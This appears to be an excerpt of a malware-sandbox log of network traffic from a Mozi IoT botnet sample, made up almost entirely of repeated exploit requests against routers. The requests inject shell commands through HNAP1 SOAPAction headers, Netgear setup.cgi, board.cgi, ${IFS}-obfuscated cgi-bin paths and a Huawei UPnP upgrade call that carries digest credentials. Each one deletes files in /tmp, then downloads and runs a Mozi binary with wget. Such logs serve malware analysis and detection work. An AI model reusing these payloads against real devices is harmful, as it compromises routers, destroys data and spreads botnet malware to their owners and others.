                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 198.206.241.104:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 121.13.98.106:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 220.123.226.47:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 154.235.218.105:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 116.138.251.1:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 62.39.202.69:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 136.14.10.125:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
